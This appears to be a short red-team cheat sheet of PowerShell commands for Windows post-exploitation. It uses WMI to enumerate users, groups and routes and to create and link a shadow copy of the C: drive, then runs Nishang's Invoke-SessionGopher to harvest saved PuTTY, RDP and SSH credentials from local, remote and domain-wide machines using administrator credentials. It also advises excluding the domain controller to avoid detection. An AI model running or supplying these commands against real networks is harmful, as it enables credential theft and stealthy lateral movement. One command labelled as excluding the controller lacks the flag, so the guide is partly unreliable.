Red Team WMI

PS C:\> Get-WmiObject -Class win32_IP4RouteTable

PS C:\> Get-WmiObject -Class win32_useraccount

PS C:\> Get-WmiObject -Class win32_group

PS C:\> Get-WmiObject -Class win32_shadowcopy

PS C:\> (Get-WmiObject -Class win32_shadowcopy -List).create(“c:\”,”clientaccesible”)

PS C:\> $link = (Get-WmiObject -Class win32_shadowcopy).deviceobject + “\”

PS C:\> cmd /c mklink /d c:\shadowcopy “$link”

Gather information from the local box:

Invoke-sessiongopher.ps1 :

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> . .\Invoke-SessionGopher.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher –verbose

Gather information from a remote box :

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -computername 192.168.222.144 -credential SECURITY\administrator

Gather information from all machines in the domain:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Credential SECURITY\administrator –AllDomain

Gather information from all machines in the domain but exclude the DC from the list to avoid detection:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Credential SECURITY\administrator

If thorough mode is used , the filesystem of the target mahine is searched for putty private key files (.ppk),RDP,files(.rdp) & RSA(.stdid).

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher –thorough

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose -Computername 192.168.222.144

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose –AllDomain

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Gather> Invoke-SessionGopher -Verbose -AllDomain –ExcludeDC

@Saksham Dixit